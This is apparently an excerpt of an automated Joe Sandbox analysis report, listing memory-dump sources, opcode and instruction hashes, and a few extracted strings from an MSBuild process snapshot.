                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff8b803a4e77669dbea9cf08da6f9f4016be50a816835faf65328fe30a6ce3ea
                                                          • Instruction ID: 3651e19d249b8c52e410f9916003dae957cee6727aa03b748c2091d58c127d7e
                                                          • Opcode Fuzzy Hash: ff8b803a4e77669dbea9cf08da6f9f4016be50a816835faf65328fe30a6ce3ea
                                                          • Instruction Fuzzy Hash: 69212834B00205CFDB58EB78C658BAE77F5EB4C644B104468E906EB3A4EB759D41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f3d273b21333940e65fa9493c665ad3fe6873bf00d78e95839c5b358ae58a4d
                                                          • Instruction ID: 2330babfbc17f57393edadcf1f1f210cebeb4268abf557f7f9c161e68a2cce9d
                                                          • Opcode Fuzzy Hash: 7f3d273b21333940e65fa9493c665ad3fe6873bf00d78e95839c5b358ae58a4d
                                                          • Instruction Fuzzy Hash: 4211A076B002599BCF61AA7C984875FBFE9EB88B54F100865E906D7344EB35C8028BD1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34d62fbd8b44477e9a0463037094e4322f09cdd7a389223a7eb24880f2d9fcf0
                                                          • Instruction ID: 06a7bb897605a8f5c94ab13573e880ee41a540b340925f0ce54a2ac15386ef40
                                                          • Opcode Fuzzy Hash: 34d62fbd8b44477e9a0463037094e4322f09cdd7a389223a7eb24880f2d9fcf0
                                                          • Instruction Fuzzy Hash: 8511CA30A053448FEFAA5B79D454FA93B64E741B1CF10497AF856DF242D923CC458BC2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b66c25ea94d9bd01e1933158d5148be3947ddaf667e4957e0c5129b6e0cca4bc
                                                          • Instruction ID: ee758e7a0b400f09af147cbd02686691b2af4bba3bd888b8b1de59511fd54a0a
                                                          • Opcode Fuzzy Hash: b66c25ea94d9bd01e1933158d5148be3947ddaf667e4957e0c5129b6e0cca4bc
                                                          • Instruction Fuzzy Hash: 33119430B012088BEFA9AB7DD454F293B95FB45B18F104979F856CF346DA22CC858BC1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 998a371145c8cc60cb14e81337bb9da944a484b4a748caeae27b41d4e64186c8
                                                          • Instruction ID: b40c841bd4b4a34283a8b6f7ac36ff5a506b325cb99f4a80e237513fb79b0fed
                                                          • Opcode Fuzzy Hash: 998a371145c8cc60cb14e81337bb9da944a484b4a748caeae27b41d4e64186c8
                                                          • Instruction Fuzzy Hash: 9C11B2316093848FD316AB79D42479A7FB6AF8B605F1544EEC085DF2A3DA354C05CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1dfbf11ebfbd3e62aa7f6f5dd046be8ff9b043e3fcf47ccc0ac36b0d86714267
                                                          • Instruction ID: a8def02aa47bf4f645cf453b6d188c54fcad8a956791f30111cde48c5628dbd3
                                                          • Opcode Fuzzy Hash: 1dfbf11ebfbd3e62aa7f6f5dd046be8ff9b043e3fcf47ccc0ac36b0d86714267
                                                          • Instruction Fuzzy Hash: AD11A571E012169BCFA5EFBC8440AAE7BF4EF48629B140479EC05F7301E632D942CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591757382.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_10fd000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                          • Instruction ID: 40fe104e48457e996c899aaa451e8bd4e46c8824c697f02dcab4b87a82880fd7
                                                          • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                          • Instruction Fuzzy Hash: 2311DD75504280CFCB16CF54D5C4B15FFA2FB84314F28C6AEE9494BA96C33AD44ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b5371290746ab8ce7a7cb433f2ddbebc44dc3c054b6808e625bece66cda5621
                                                          • Instruction ID: 10bf52f19ca6fbf3a93b79f403b63752ab5ed47e3e8193e9a52773ce03816083
                                                          • Opcode Fuzzy Hash: 2b5371290746ab8ce7a7cb433f2ddbebc44dc3c054b6808e625bece66cda5621
                                                          • Instruction Fuzzy Hash: BD018071A012168BCFA5EFBC8450AAE7BF8EB48628B14047ADC05F7301E736D842CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b46e0ed72957b0b42998187f208d60c4b1d1bf803915cfcb55035a69d6d580f
                                                          • Instruction ID: 17baf06b1e97849efbe5b001cba1076f97e96972c8d465aa654d0fe74f5d7142
                                                          • Opcode Fuzzy Hash: 3b46e0ed72957b0b42998187f208d60c4b1d1bf803915cfcb55035a69d6d580f
                                                          • Instruction Fuzzy Hash: C3112671A00201CFEB01DFA5D948789BBB6FF95300F1586A5C8486F2DAEB74DD06C7A1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00ffcc0087ac565877369c2c1037173daf7012d4e07644e339c733432ffba76b
                                                          • Instruction ID: ae5bddbf3d7e4bcaa66005f1796d4575a2553018a264d5e7cc05a1e3efe0b142
                                                          • Opcode Fuzzy Hash: 00ffcc0087ac565877369c2c1037173daf7012d4e07644e339c733432ffba76b
                                                          • Instruction Fuzzy Hash: 1D016D706142899FDB06FBA4E990A9D7F71EF41304B9446ACC0109F297EF316E16EB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de5b3354b80ba84b6f75c0b9dae232bb48504c79fce8910c177d648c134ffb7f
                                                          • Instruction ID: 2162e01d60b4182f799c20a36fe3ef03a3e779884cbed942e5e53418ef9813d0
                                                          • Opcode Fuzzy Hash: de5b3354b80ba84b6f75c0b9dae232bb48504c79fce8910c177d648c134ffb7f
                                                          • Instruction Fuzzy Hash: F3F0EC70A112499FDB06FBA8E99069DBBB5AB44300F904668C0049F255EF706E159B91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$\Vam$dyqJ$dyqJ
                                                          • API String ID: 0-3757870759
                                                          • Opcode ID: c8aadf4d55d44d441963e16ab292a7c3283966f786a47de4ec2829498e37bb09
                                                          • Instruction ID: 03ce0bd9e2489bee3e03248df3dcd01f9917f0458ebaf1c8163a93897387f9a6
                                                          • Opcode Fuzzy Hash: c8aadf4d55d44d441963e16ab292a7c3283966f786a47de4ec2829498e37bb09
                                                          • Instruction Fuzzy Hash: E8716F70E00349DFDF58CFA9C885BDEBBF2AF88714F148129E805A7254EB759885CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$\Vam$dyqJ$dyqJ
                                                          • API String ID: 0-3757870759
                                                          • Opcode ID: 2d7d4f148babf28a43408f2b06ea3a596578ac53bed4403a96f56839596a04d4
                                                          • Instruction ID: d15b4dbb1c0aa21f0037b6643ca44fd6265c9353a04803217335583a2b9437bd
                                                          • Opcode Fuzzy Hash: 2d7d4f148babf28a43408f2b06ea3a596578ac53bed4403a96f56839596a04d4
                                                          • Instruction Fuzzy Hash: 72715D70D00349DFDF54CFA9C885BDEBBF1AF88B18F148129E804A7254EB759885CB91